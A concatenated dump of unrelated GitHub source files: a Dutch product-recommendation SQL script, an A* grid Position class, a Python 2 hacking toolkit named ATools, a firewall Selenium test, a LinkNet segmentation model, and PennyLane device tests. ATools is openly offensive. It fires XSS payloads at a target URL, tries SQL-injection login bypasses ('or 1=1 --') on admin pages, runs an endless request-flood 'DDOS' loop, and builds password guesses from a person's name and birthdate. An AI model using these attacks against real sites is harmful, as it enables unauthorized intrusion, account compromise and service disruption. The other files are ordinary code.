sql_query("""CREATE TABLE profiels_type_browsers
(profid VARCHAR ,
prodid VARCHAR ,
product_name VARCHAR ,
segment VARCHAR ,
FOREIGN KEY (prodid) REFERENCES products(id),
FOREIGN KEY (profid) REFERENCES profiles(id));""")
#And one for BOUNCERS types
sql_query("""CREATE TABLE profiels_type_boucer
(profid VARCHAR ,
prodid VARCHAR ,
product_name VARCHAR ,
segment VARCHAR ,
FOREIGN KEY (prodid) REFERENCES products(id),
FOREIGN KEY (profid) REFERENCES profiles(id));""")
commit()
bouncer , BROWSER = select_profiels_types_bouncer_and_browser()
#Inserting the data into the tabels
for row in bouncer :
profid = row[0]
segment = row[1]
prodid = row[2]
name = row[3]
sql_execute("Insert into profiels_type_boucer(profid ,segment , prodid, product_name) VALUES (%s , %s, %s, %s)",[profid,segment,prodid , name])
commit()
for row0 in BROWSER :
profid1 = row0[0]
segment1 = row0[1]
prodid1 = row0[2]
name1 = row0[3]
sql_execute("Insert into profiels_type_browsers(profid ,segment , prodid, product_name ) VALUES (%s , %s, %s, %s)",[profid1,segment1,prodid1 , name1])
commit()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
print("Collaborative Filtering {profiels_type_browsers & bouncers} are Done ")
profiels_types_bouncer_and_browser()
def select_profiels_type_buyer():
"""This fuction will Select & filter the type BUYER profiels the Postgres db """
try:
return sql_select("""SELECT sessions.id, sessions.profid,sessions.segment, orders.prodid, products.name
FROM sessions
INNER JOIN orders ON sessions.id = orders.sessionsid
INNER JOIN products on orders.prodid = products.id
GROUP BY sessions.id, sessions.profid,orders.prodid, products.name, sessions.segment ;
""")
except (Exception, psycopg2.DatabaseError) as error:
print(error)
def profiels_type_buyer():
""" This function will create profiels type buyer for on the Postgres db """
try:
sql_query("DROP TABLE IF EXISTS profiels_type_buyer CASCADE")
commit()
sql_query("""CREATE TABLE profiels_type_buyer
(profid VARCHAR ,
prodid VARCHAR ,
product_name VARCHAR ,
segment VARCHAR ,
FOREIGN KEY (prodid) REFERENCES products(id),
FOREIGN KEY (profid) REFERENCES profiles(id)); """)
commit()
BUYER = select_profiels_type_buyer()
for row in BUYER :
profid1 = row[1]
segment1 = row[2]
prodid1 = row[3]
name1 = row[4]
sql_execute("Insert into profiels_type_buyer(profid ,segment , prodid, product_name ) VALUES (%s , %s, %s, %s)",[profid1,segment1,prodid1 , name1])
commit()
except (Exception, psycopg2.DatabaseError) as error :
print(error)
print("Collaborative Filtering {profiels_type_buyer} is Done ")
profiels_type_buyer()
""" TEST !! """
print("Content-Based Filtering \n")
print("Populair bij op = op \n")
print(sql_select("""SELECT prodid , name
FROM BEST_seller
WHERE Counter > 1000
LIMIT 4; """),"\n")
print("Andere kijken ook \n")
print(sql_select(""" SELECT prodid , name
FROM most_viwed_products
WHERE Counter > 5000
LIMIT 4; """), "\n")
print("Collaborative Filtering \n ")
print(" U kan de ID {5a394475ed29590001038e43} gebruiken Voor {BUYER} \n en ID {59dce40ea56ac6edb4c37dfd} gebruiken Voor {BOUNCER} \n En ID {59dce40ea56ac6edb4c37df5} Voor {BROWSER} ")
IDp = input("Voer Eem ID in ")
if IDp == "5a394475ed29590001038e43" :
print("BUYER Type")
print(sql_select("""SELECT prodid , product_name
FROM profiels_type_buyer
LiMIT 4 ;"""))
elif IDp == "59dce40ea56ac6edb4c37dfd":
print("BOUNCER TYPE ")
print(sql_select("""SELECT prodid , product_name
FROM profiels_type_boucer
LiMIT 4 ;"""))
elif IDp == "59dce40ea56ac6edb4c37df5":
print("BROWSER TYPE")
print(sql_select("""SELECT prodid , product_name
FROM profiels_type_browsers
LiMIT 4 ;"""))
disconnect() | [
"71430169+hassoonsy2@users.noreply.github.com"
] | 71430169+hassoonsy2@users.noreply.github.com |
ce7a61def0f53cb668183add833aabc77c48c1b5 | 26dc729f95901e3a2dea601a7f9918b40a5bd5b1 | /Position.py | dc8baea414e339d06e0be7436571574f71ae0031 | [
"MIT"
] | permissive | yuvrajwaraich/Pathfinder | d3055310fc1b68925379091d6e2c17ea441784f1 | 99ea7f3f6c723ac57299e8dcefb275872533dfc0 | refs/heads/master | 2022-12-23T15:38:48.760347 | 2020-09-29T01:12:10 | 2020-09-29T01:12:10 | 299,469,925 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,581 | py | class Position():
def __init__(self, row, col, squareType="PATH", prev=None, g_cost=0, h_cost=0):
self.row = row
self.col = col
self.squareType = squareType
self.prev = prev
self.visited = False
self.g_cost = g_cost
self.h_cost = h_cost
self.f_cost = g_cost + h_cost
def getRow(self):
return self.row
def getCol(self):
return self.col
def getType(self):
return self.squareType
def setType(self, newType):
self.squareType = newType
def getTypeString(self):
if self.squareType == "START":
return "S"
elif self.squareType == "FINISH":
return "F"
elif self.squareType == "WALL":
return "#"
else:
return "."
def getPrev(self):
return self.prev
def setPrev(self, pos):
self.prev = pos
def getVisited(self):
return self.visited
def setVisited(self, value):
self.visited = value
def getGCost(self):
return self.g_cost
def setGCost(self, newCost):
self.g_cost = newCost
self.f_cost = self.g_cost + self.h_cost
def getHCost(self):
return self.h_cost
def setHCost(self, newCost):
self.h_cost = newCost
self.f_cost = self.g_cost + self.h_cost
def getFCost(self):
return self.f_cost
def toString(self):
return f'coords = {self.row, self.col}, SquareType = "{self.squareType}"'
| [
"noreply@github.com"
] | yuvrajwaraich.noreply@github.com |
37d6e9b44bdd2a6a959ddb491fe0ca8dfc01fdcf | 2e5b9de7f9e545655c323e344840d2648b6459db | /ATools.py | b13e05e4fe523c55b249ed11f4528e3ede3da932 | [] | no_license | AbdXH4K3r/ATools | a6871fca919eb8216bebcf1bd29d8b336048dd9d | 878431b1e52c550e07668868dce3f080e4b1f5b9 | refs/heads/master | 2020-04-07T00:46:14.245202 | 2019-01-12T13:08:03 | 2019-01-12T13:08:03 | 157,917,864 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,149 | py | # -*- coding: utf-8 -*
#ATOOLS by Abdxslayer
#http://www.github.com/ABDXH4K3r
import os
import sys
import time
import re
import requests
import random
import socket
import re
import platform
import json
from urllib2 import urlopen
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
def clear():
sys = platform.system()
if sys == 'Windows':
os.system('cls')
if sys == 'Linux':
os.system('clear')
def exit():
exit = raw_input("Enter To Exit...")
def XSS():
red = '\33[31m'
yellow = '\33[33m'
green = '\33[92m'
blue = '\33[34m'
def stop():
exit()
imp = (red+("IMPORTANT !!!, Download Geckodriver then put in the path !! "))
print imp
link = raw_input(red+"[+] Target Link : ")
opt = (yellow+"[+] Option (-easy,-medium): ")
easyscript = ("'<script>alert('XSS')</script>")
mediumscript = ["<svg onload='XSS'>",'<IMG """><script>alert("xss")</script>">"',"<scri<script>pt>JS Code</script>",'"><img src="link" onerror=Js code;']
browser = webdriver.Firefox()
if opt=='-easy':
clear()
r = requests.get(link+easyscript)
browser.get(link+easyscript)
if r.status_code==200:
try:
WebDriverWait(browser, 3).until(EC.alert_is_present(),
'Timed out waiting for PA creation ' +
'confirmation popup to appear.')
alert = browser.switch_to.alert
alert.accept()
print("alert accepted")
print str(green+'[+] Success !,'+blue+'Website Has XSS level easy.'+"XSS By "+easyscript)
except TimeoutException:
print("no alert")
print str(red+'[-] Website Xss vulnerability is high level,'+yellow+'try "-medium" or "high" option.')
if opt=='-medium':
clear()
browser.get(link)
one = requests.get(link+"'"+mediumscript[0])
browser.get(link+"'"+mediumscript[0])
if one.status_code == 200:
try:
WebDriverWait(browser, 3).until(EC.alert_is_present(),
'Timed out waiting for PA creation ' +
'confirmation popup to appear.')
alert = browser.switch_to.alert
alert.accept()
print("alert accepted")
print str(green+'[+] Success !,'+blue+'Website Has XSS level easy.'+"XSS By "+easyscript)
except TimeoutException:
two = requests.get(link+"'"+mediumscript[1])
if two.status_code == 200:
browser.get(link+"'"+mediumscript[1])
try:
WebDriverWait(browser, 3).until(EC.alert_is_present(),
'Timed out waiting for PA creation ' +
'confirmation popup to appear.')
alert = browser.switch_to.alert
alert.accept()
print("alert accepted")
print str(green+"Success !"+'Xss By '+mediumscript[1])
except TimeoutException:
print("no alert")
three = requests.get(link+"'"+mediumscript[2])
try:
WebDriverWait(browser, 3).until(EC.alert_is_present(),
'Timed out waiting for PA creation ' +
'confirmation popup to appear.')
alert = browser.switch_to.alert
alert.accept()
print("alert accepted")
print str(green+"Success !"+'Xss By '+mediumscript[2])
except TimeoutException:
print("no alert")
browser.get(link+"'"+mediumscript[3])
four = requests.get(link+"'"+mediumscript[3])
try:
WebDriverWait(browser, 3).until(EC.alert_is_present(),
'Timed out waiting for PA creation ' +
'confirmation popup to appear.')
alert = browser.switch_to.alert
alert.accept()
print("alert accepted")
print str(green+"Success !"+'Xss By '+mediumscript[1])
except TimeoutException:
print("no alert")
print str(red+'[-] Failed !, Medium Xss is not valid for this website. We Are working for The high option...')
if opt=='-high':
print str(yellow+"Soon...")
clear()
def Logo():
print ("""\33[92m
██████ █████ █████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██ ██ ██
██████ ██████ ██ ██ ██
██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██ ██ ██
██ ██ █████ █████ ██ ██
SLAYER
""")
def WebInfo():
clear()
lineacc = "[================[New]=================]"
lineaccunder = "[====================[END]===================]\n"
filepath = raw_input("Enter File Path : ")
with open(filepath) as fp:
line = fp.readline()
cnt = 1
while line:
print (lineacc)
print("[Line {}: {}]".format(cnt, line.strip()))
command = ('host'+' '+line)
print("-------------------------------------------")
cmnd = os.system(command)
owner = ('whois ',line,' | grep "OrgName"')
owner = "%s%s%s"%(owner)
os.system(owner)
print (lineaccunder)
line = fp.readline()
cnt += 1
Logo()
tools = raw_input("""\33[34m
[==========Tools==========]
\33[34m[\33[31m1\33[34m].\33[33mInformation Gathering.
\33[34m[\33[31m2\33[34m].\33[33mXSS Tools.
\33[34m[\33[31m3\33[34m].\33[33mSQL Injection Tools.
\33[34m[\33[31m4\33[34m].\33[33mAdmin Panel Attack.
\33[34m[\33[31m5\33[34m].\33[33mWebsite Info Gathering.
\33[34m[\33[31m6\33[34m].\33[33mULTRA DDOS.
\33[34m[\33[31m7\33[34m].\33[33mUpdate & Upgrade.
\33[34m[\33[31m99\33[34m].\33[33mEXIT.
\33[31mSet > """)
def website_info_grab():
clear()
Logo()
url = raw_input("\33[92mURL \33[31mTarget\33[92m \33[92m(Ex: google.com) \33[92m : ")
ip = socket.gethostbyname(url)
location = geolite2.lookup(ip)
location is not None
clear()
print("[==========Website Info==========]")
print("\33[92mHost Ip : \33[92m"+ip)
print ("\33[92mLocation : \33[92m"+location.country)
print ("\33[92mTimezone : \33[92m"+location.timezone)
request = b"GET / HTTP/1.1\nHost: ",url,'\n\n'
request = "%s%s%s"%(request)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((url, 80))
s.send(request)
result = s.recv(10000)
print(result)
def DDOS():
clear()
Logo()
target = raw_input("[X] Enter Target (*http://* is obligatory) : ")
num = 0
while True:
num = num+1
r = requests.get(target)
print ("[X] DDOS {} > CODE > {} SENT [X]".format(num,r.status_code))
def Passwordlist():
clear()
Logo()
name = raw_input("Enter Name : ")
lastname = raw_input("Enter The LastName : ")
dbirth = raw_input("Enter Day of birth : ")
mbirth = raw_input("Enter Month of birth : ")
ybirth = raw_input("Enter Year of birth : ")
namepass = raw_input("Enter A Name of Your PasswordList (DON'T FORGET .txt) : ")
file = open(namepass, 'w')
file.write(name+lastname+"\n")
file.write(lastname+name+"\n")
file.write(name+dbirth+"\n")
file.write(dbirth+name+"\n")
file.write(name+name+"\n")
file.write(name+ybirth+"\n")
file.write(name+mbirth+"\n")
file.write(ybirth+name+"\n")
file.write(mbirth+name+"\n")
file.write(ybirth+lastname+"\n")
file.write(dbirth+lastname+"\n")
file.write(mbirth+lastname+"\n")
file.write(ybirth+lastname+name+"\n")
file.write(ybirth+name+lastname+"\n")
file.write(lastname+lastname+ybirth+"\n")
file.write(name+lastname+ybirth+"\n")
file.write(name+lastname+dbirth+"\n")
file.write(name+lastname+mbirth+"\n")
file.write(name+lastname+'2000'+"\n")
file.write(name+lastname+'2001'+"\n")
file.write(name+lastname+'2002'+"\n")
file.write(name+lastname+'2003'+"\n")
file.write(name+lastname+'2004'+"\n")
file.write(name+lastname+'2005'+"\n")
file.write(name+lastname+'2006'+"\n")
file.write(name+lastname+'2007'+"\n")
file.write(name+lastname+'2008'+"\n")
file.write(name+lastname+'2009'+"\n")
file.write(name+lastname+'2010'+"\n")
file.write(name+lastname+'2011'+"\n")
file.write(name+lastname+'2012'+"\n")
file.write(name+lastname+'2013'+"\n")
file.write(name+lastname+'2014'+"\n")
file.write(name+lastname+'2015'+"\n")
file.write(name+lastname+'2016'+"\n")
file.write(name+lastname+'2017'+"\n")
file.write(name+lastname+'2018'+"\n")
file.write(name+lastname+'2019'+"\n")
file.write(name+lastname+'2020'+"\n")
file.write(name+lastname+'123'+"\n")
file.write(name+lastname+'666'+"\n")
file.write(name+lastname+'000'+"\n")
file.write(name+lastname+'123'+"\n")
file.write(name+lastname+'123456'+"\n")
file.write("Azerty"+"\n")
file.write("Azerty123"+"\n")
file.write("Azerty123456"+"\n")
file.write("Azerty112233"+"\n")
file.write("Azerty2000"+"\n")
file.write("Azerty2017"+"\n")
file.write("Azerty2018"+"\n")
file.write("Azerty2019"+"\n")
file.write("Azerty2020"+"\n")
file.write("Azertyuiop^$"+"\n")
file.close()
def ip_info():
clear()
Logo()
ip = raw_input("[+] Enter IP Adress : ")
url = 'http://ipinfo.io/json'
response = urlopen(url)
data = json.load(response)
IP=data['ip']
org=data['org']
city = data['city']
country=data['country']
region=data['region']
info = 'IP detail:\nIP : {4} \nRegion : {1} \nCountry : {2} \nCity : {3} \nOrg : {0}'.format(org,region,country,city,IP)
print info
def AdminPanel():
clear()
Logo()
website = raw_input("Enter website Admin Login Page : ")
r = requests.get(website)
if r.status_code == 200 or r.status_code == 403:
print ("[+] SUCCESS WE FOUNDED THE WEBSITE !")
print ("[+] TRYING TO BYPASS THE ADMIN LOGIN ...")
log = requests.get(website, auth=("' or 1=1 --", "' or 1=1 --"))
if log.status_code is not 200:
print "Method 1 Failure. [/] Trying other methods..."
log = requests.get(website, auth=("' or ''='", "' or ''='"))
if log.status_code is not 200:
print "Method 2 Failure. [/] Trying other methods..."
log = requests.get(website, auth=("' or 1--", ""))
if log.status_code is not 200:
print "Method 3 Failure. [/] Trying other methods..."
log = requests.get(website, auth=("') or true--", ""))
if log.status_code is not 200:
print "Method 4 Failure. [/] Trying other methods..."
log = requests.get(website, auth=("'-'", ""))
if log.status_code is not 200:
exit = raw_input("[-] FAILED TO BYPASS ADMIN PANEL...")
print "Method 5 Failure. \nSorry :( You can report this to me: \n As8apple@gmail.com"
if r.status_code is not 200:
print ("[-] FAILED WE DIDN'T FOUND THE WEBSITE !")
def sql_inj():
clear()
Logo()
website = raw_input("Enter website Url : ")
r = requests.get(website)
response = r
print ("\33[34m[\33[33m+\33[34m] \33[33mCONNECTING TO",r.url)
sql = "'"
sql_injection = (website,sql)
sql_injection = "%s%s"%(sql_injection)
final = requests.get(sql_injection)
try:
if final.status_code == 200:
file = open("result_sql.txt",'w')
txt = (website+'\n')
file.write(txt)
print ("\33[34m[\33[33m+\33[34m] \33[33mSUCCESS, WEBSITE ADDED TO YOUR SQL VULNURABLE LIST.")
if final.status_code is not 200:
print ("\33[34m[-] FAILED, THE WEBSITE ENTRED IS NOT VULNURABLE.")
except:
print ("\33[34m[-] ERROR, CHECK THE LINK IF IT EXIST/ADD (http://www.) to the website.")
if tools =='1':
clear()
Logo()
info_grab = raw_input("""
[==========Information Gathering==========]
\33[34m[\33[31m01\33[34m].\33[33mWebsite.
\33[34m[\33[31m02\33[34m].\33[33mPasswordList.
\33[34m[\33[31m03\33[34m].\33[33mIp.
\33[31mSet > """)
if info_grab == '1':
website_info_grab()
if info_grab == '2':
clear()
Passwordlist()
if info_grab == '3':
ip_info()
if tools == '2':
XSS()
if tools=='3':
sql_inj()
if tools=='4':
AdminPanel()
if tools=='5':
WebInfo()
if tools=='6':
DDOS()
if tools=='7':
clear()
Logo()
system = platform.system()
if system == 'Windows':
os.system('start "http://github.com/ABDXH4K3r"')
if system == 'Linux':
os.system('firefox "http://github.com/ABDXH4K3r"')
if tools=='99':
exit()
| [
"noreply@github.com"
] | AbdXH4K3r.noreply@github.com |
b92267db4323341dfa9c38b216bca9f91bb337b0 | 76b4790cc405d8287fccfa2dd691f4415fc88a11 | /format/mpls/playlist/play_item/__init__.py | c58d6a32d299fbb04eff8c2fa3060a099b8e3ce4 | [] | no_license | Nicba1010/blumount-python | 8131f6685469e73b05068c3e41c9b709ccc21a5a | 648c44b74617186172c767c66c98299e7688c056 | refs/heads/master | 2022-12-16T15:14:12.294720 | 2020-09-13T11:55:01 | 2020-09-13T11:55:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31 | py | from .play_item import PlayItem | [
"nicba1010@gmail.com"
] | nicba1010@gmail.com |
6d2cce74c330a140309c8fdbe07a96d959916b66 | e2e08d7c97398a42e6554f913ee27340226994d9 | /pyautoTest-master(ICF-7.5.0)/test_case/scg_old/scg_obj_shell_2nd/test_c40407.py | bc6d1b372424eea87293ec88ccf7c74bca513fd8 | [] | no_license | lizhuoya1111/Automated_testing_practice | 88e7be512e831d279324ad710946232377fb4c01 | b3a532d33ddeb8d01fff315bcd59b451befdef23 | refs/heads/master | 2022-12-04T08:19:29.806445 | 2020-08-14T03:51:20 | 2020-08-14T03:51:20 | 287,426,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,560 | py | import pytest
import time
import sys
from page_obj.scg.scg_def import *
from page_obj.scg.scg_def_obj import *
from page_obj.scg.scg_def_log import *
from page_obj.common.rail import *
from page_obj.scg.scg_def_acl import *
from os.path import dirname, abspath
sys.path.insert(0, dirname(dirname(abspath(__file__))))
test_id = 40407
# 添加一个weekly schedule,包含一个schedule,查看log
def test_obj_wxw(browser):
try:
login_web(browser, url="10.2.2.81")
# 切换到默认frame
browser.switch_to.default_content()
# 切换到左侧frame
browser.switch_to.frame("lefttree")
# 点击对象
browser.find_element_by_xpath(对象).click()
# 点击计划任务
browser.find_element_by_xpath(计划任务).click()
# 点击基础计划任务
browser.find_element_by_xpath('//*[@id="menu"]/div[4]/div/ul/li[5]/ul/li[1]/span/a/span').click()
add_obj_schdule_wxw(browser, name='schdule_407', desc='描述', recurring='yes', fromtime='01:00', totime='02:00')
# 切换到默认frame
browser.switch_to.default_content()
# 切换到左侧frame
browser.switch_to.frame("lefttree")
# 点击计划任务
browser.find_element_by_xpath(计划任务).click()
# 点击周计划任务
browser.find_element_by_xpath(周计划任务).click()
add_obj_weekly_schdule_wxw(browser, name='week_schd_407', desc='miaoshu',
monday='yes', schdule1='schdule_407',
tuesday='', schdule2='',
wednesday='', schdule3='',
thursday='', schdule4='',
friday='', schdule5='',
saturday='', schdule6='',
sunday='yes', schdule7='schdule_407', )
time.sleep(2)
# 切换到默认frame
browser.switch_to.default_content()
get_log(browser, 管理日志)
browser.switch_to.default_content()
# 切换到左侧frame
browser.switch_to.frame("content")
loginfo = browser.find_element_by_xpath('//*[@id="namearea0"]').text
# print(loginfo)
try:
assert "配置周程表对象成功,添加内部对象 [week_schd_407]" in loginfo
rail_pass(test_run_id, test_id)
except:
rail_fail(test_run_id, test_id)
assert "配置周程表对象成功,添加内部对象 [week_schd_407]" in loginfo
except Exception as err:
# 如果上面的步骤有报错,重新设备,恢复配置
reload(hostip="10.2.2.81")
print(err)
rail_fail(test_run_id, test_id)
time.sleep(70)
assert False
if __name__ == '__main__':
pytest.main(["-v", "-s", "test_c40407.py"]) | [
"15501866985@163.com"
] | 15501866985@163.com |
8afba1b98f5baf9799fa457a5d385645ca3c76ae | 0bccd9c02c258705bcbb429c29c7c84ecdef7d71 | /model/LinkNet.py | da0bde540d2d6f93f1e4a055ef6a620d8caa505a | [
"MIT"
] | permissive | XiudingCai/vessel-segmentation-for-retina | 805f11b697c4cbf9a31fbd0960d30d6fe9bce215 | 664db9d44d894442ce957801865858874ece35c3 | refs/heads/master | 2023-03-15T04:13:44.147287 | 2021-03-26T03:28:24 | 2021-03-26T03:28:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,131 | py | ############################################################################################
# LinkNet: Exploiting Encoder Representations for Efficient Semantic Segmentation
# Paper-Link: https://arxiv.org/pdf/1707.03718.pdf
############################################################################################
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchsummary import summary
from torchvision.models import resnet
__all__ = ["LinkNet"]
class BasicBlock(nn.Module):
def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, groups=1, bias=False):
super(BasicBlock, self).__init__()
self.conv1 = nn.Conv2d(in_planes, out_planes, kernel_size, stride, padding, groups=groups, bias=bias)
self.bn1 = nn.BatchNorm2d(out_planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = nn.Conv2d(out_planes, out_planes, kernel_size, 1, padding, groups=groups, bias=bias)
self.bn2 = nn.BatchNorm2d(out_planes)
self.downsample = None
if stride > 1:
self.downsample = nn.Sequential(nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(out_planes), )
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out = self.relu(out + residual)
return out
class Encoder(nn.Module):
def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, groups=1, bias=False):
super(Encoder, self).__init__()
self.block1 = BasicBlock(in_planes, out_planes, kernel_size, stride, padding, groups, bias)
self.block2 = BasicBlock(out_planes, out_planes, kernel_size, 1, padding, groups, bias)
def forward(self, x):
x = self.block1(x)
x = self.block2(x)
return x
class Decoder(nn.Module):
def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=False):
# TODO bias=True
super(Decoder, self).__init__()
self.conv1 = nn.Sequential(nn.Conv2d(in_planes, in_planes // 4, 1, 1, 0, bias=bias),
nn.BatchNorm2d(in_planes // 4),
nn.ReLU(inplace=True))
self.tp_conv = nn.Sequential(
nn.ConvTranspose2d(in_planes // 4, in_planes // 4, kernel_size, stride, padding, output_padding, bias=bias),
nn.BatchNorm2d(in_planes // 4),
nn.ReLU(inplace=True))
self.conv2 = nn.Sequential(nn.Conv2d(in_planes // 4, out_planes, 1, 1, 0, bias=bias),
nn.BatchNorm2d(out_planes),
nn.ReLU(inplace=True))
def forward(self, x_high_level, x_low_level):
x = self.conv1(x_high_level)
x = self.tp_conv(x)
# solution for padding issues
# diffY = x_low_level.size()[2] - x_high_level.size()[2]
# diffX = x_low_level.size()[3] - x_high_level.size()[3]
# x = F.pad(x, [diffX // 2, diffX - diffX // 2, diffY // 2, diffY - diffY // 2])
x = center_crop(x, x_low_level.size()[2], x_low_level.size()[3])
x = self.conv2(x)
return x
def center_crop(layer, max_height, max_width):
_, _, h, w = layer.size()
diffy = (h - max_height) // 2
diffx = (w - max_width) // 2
return layer[:, :, diffy:(diffy + max_height), diffx:(diffx + max_width)]
def up_pad(layer, skip_height, skip_width):
_, _, h, w = layer.size()
diffy = skip_height - h
diffx = skip_width - w
return F.pad(layer, [diffx // 2, diffx - diffx // 2,
diffy // 2, diffy - diffy // 2])
class LinkNetImprove(nn.Module):
"""
Generate Model Architecture
"""
def __init__(self, classes=19):
"""
Model initialization
:param x_n: number of input neurons
:type x_n: int
"""
super().__init__()
base = resnet.resnet18(pretrained=True)
self.in_block = nn.Sequential(
base.conv1,
base.bn1,
base.relu,
base.maxpool
)
self.encoder1 = base.layer1
self.encoder2 = base.layer2
self.encoder3 = base.layer3
self.encoder4 = base.layer4
self.decoder1 = Decoder(64, 64, 3, 1, 1, 0)
self.decoder2 = Decoder(128, 64, 3, 2, 1, 1)
self.decoder3 = Decoder(256, 128, 3, 2, 1, 1)
self.decoder4 = Decoder(512, 256, 3, 2, 1, 1)
# Classifier
self.tp_conv1 = nn.Sequential(nn.ConvTranspose2d(64, 32, 3, 2, 1, 1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True), )
self.conv2 = nn.Sequential(nn.Conv2d(32, 32, 3, 1, 1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True), )
self.tp_conv2 = nn.ConvTranspose2d(32, classes, 2, 2, 0)
def forward(self, x):
# Initial block
x = self.in_block(x)
# Encoder blocks
e1 = self.encoder1(x)
e2 = self.encoder2(e1)
e3 = self.encoder3(e2)
e4 = self.encoder4(e3)
# Decoder blocks
d4 = e3 + self.decoder4(e4, e3)
d3 = e2 + self.decoder3(d4, e2)
d2 = e1 + self.decoder2(d3, e1)
d1 = x + self.decoder1(d2, x)
# Classifier
y = self.tp_conv1(d1)
y = self.conv2(y)
y = self.tp_conv2(y)
return y
class LinkNet(nn.Module):
"""
Generate model architecture
"""
def __init__(self, classes=19):
"""
Model initialization
:param x_n: number of input neurons
:type x_n: int
"""
super().__init__()
self.conv1 = nn.Conv2d(3, 64, 7, 2, 3, bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(3, 2, 1)
self.encoder1 = Encoder(64, 64, 3, 1, 1)
self.encoder2 = Encoder(64, 128, 3, 2, 1)
self.encoder3 = Encoder(128, 256, 3, 2, 1)
self.encoder4 = Encoder(256, 512, 3, 2, 1)
self.decoder4 = Decoder(512, 256, 3, 2, 1, 1)
self.decoder3 = Decoder(256, 128, 3, 2, 1, 1)
self.decoder2 = Decoder(128, 64, 3, 2, 1, 1)
self.decoder1 = Decoder(64, 64, 3, 1, 1, 0)
# Classifier
self.tp_conv1 = nn.Sequential(nn.ConvTranspose2d(64, 32, 3, 2, 1, 1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True), )
self.conv2 = nn.Sequential(nn.Conv2d(32, 32, 3, 1, 1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True), )
self.tp_conv2 = nn.ConvTranspose2d(32, classes, 2, 2, 0)
def forward(self, x):
# Initial block
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
# Encoder blocks
e1 = self.encoder1(x)
e2 = self.encoder2(e1)
e3 = self.encoder3(e2)
e4 = self.encoder4(e3)
# Decoder blocks
d4 = e3 + self.decoder4(e4, e3)
d3 = e2 + self.decoder3(d4, e2)
d2 = e1 + self.decoder2(d3, e1)
d1 = x + self.decoder1(d2, x)
# Classifier
y = self.tp_conv1(d1)
y = self.conv2(y)
y = self.tp_conv2(y)
return y
"""print layers and params of network"""
if __name__ == '__main__':
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = LinkNet(classes=11).to(device)
summary(model, (3, 512, 1024))
| [
"995959149@qq.com"
] | 995959149@qq.com |
cc974e88dd267b0c5ec00ef6321af8552980d526 | 347731bdab0fb2530ecfa90026e354a31205caf0 | /pennylane/devices/tests/test_properties.py | e7213938611c365b447fbc24f90b56f117fa3298 | [
"Apache-2.0"
] | permissive | apv-8/pennylane | 83c52a9f956b3fdb636764f529c1f0dd0d952c63 | 8792f0f88178f70a04d6f7afbbb9dd90d2e758b3 | refs/heads/master | 2023-02-20T17:44:18.041986 | 2021-01-21T20:07:56 | 2021-01-21T20:07:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,444 | py | # Copyright 2018-2020 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests that a device has the right attributes, arguments and methods."""
# pylint: disable=no-self-use
import pytest
import pennylane.numpy as pnp
import pennylane as qml
from pennylane._device import DeviceError
try:
import tensorflow as tf
TF_SUPPORT = True
except ImportError:
TF_SUPPORT = False
try:
import jax
JAX_SUPPORT = True
except ImportError:
JAX_SUPPORT = False
# Shared test data =====
def qfunc_no_input():
"""Model agnostic quantum function """
return qml.expval(qml.Identity(wires=0))
def qfunc_tensor_obs():
"""Model agnostic quantum function with tensor observable"""
return qml.expval(qml.Identity(wires=0) @ qml.Identity(wires=1))
def qfunc_probs():
"""Model agnostic quantum function returning probs"""
return qml.probs(wires=0)
def qfunc_with_scalar_input(model=None):
"""Model dependent quantum function taking a single input"""
def qfunc(x):
if model == "qubit":
qml.RX(x, wires=0)
elif model == "cv":
qml.Displacement(x, 0.0, wires=0)
return qml.expval(qml.Identity(wires=0))
return qfunc
# =======================
class TestDeviceProperties:
"""Test the device is created with the expected properties."""
def test_load_device(self, device_kwargs):
"""Test that the device loads correctly."""
device_kwargs["wires"] = 2
device_kwargs["shots"] = 1234
dev = qml.device(**device_kwargs)
assert dev.num_wires == 2
assert dev.shots == 1234
assert dev.short_name == device_kwargs["name"]
assert hasattr(dev, "analytic")
def test_no_wires_given(self, device_kwargs):
"""Test that the device requires correct arguments."""
with pytest.raises(TypeError, match="missing 1 required positional argument"):
qml.device(**device_kwargs)
def test_no_0_shots(self, device_kwargs):
"""Test that non-analytic devices cannot accept 0 shots."""
# first create a valid device to extract its capabilities
device_kwargs["wires"] = 2
device_kwargs["shots"] = 0
with pytest.raises(DeviceError, match="The specified number of shots needs to be"):
qml.device(**device_kwargs)
